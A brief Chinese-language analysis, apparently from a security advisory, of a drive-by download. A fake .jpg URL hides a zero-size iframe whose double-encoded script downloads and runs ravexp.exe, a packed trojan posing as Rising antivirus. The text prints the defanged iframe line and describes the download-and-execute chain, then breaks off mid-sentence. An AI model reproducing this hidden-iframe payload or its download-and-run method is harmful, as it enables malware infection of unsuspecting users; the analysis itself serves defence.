打开URL:
/------ hxxp://www.%6E%6A***%74%73%69***%73.com/images/ravexpert.jpg ------/
你会看到一张图片,其实这个URL指向的是一个网页,包含代码:
/------ <IFRAME align=center name="target" frameBorder=0 height=0 scrolling=no src="hxxp://www.n**j**tsi**s.com/n**j**s**ex/vip**_reg*.htm"width=0></IFRAME> ------/
vip*_reg**.htm 包含双重加密的脚本代码,第一重是escape()加密的JavaScript代码,第二重是自定义函数rechange(t)加密的VBScript代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 ravexp.exe,并利用Shell.Application 对象MircoLonge 的 ShellExecute 方法 来运行。
ravexp.exe 采用PESHiELD 0.1b MTE -> ANAKiN加壳,不仅使用类似瑞星的金狮子头作为图标,而且版本信息是伪造瑞星的:
/------
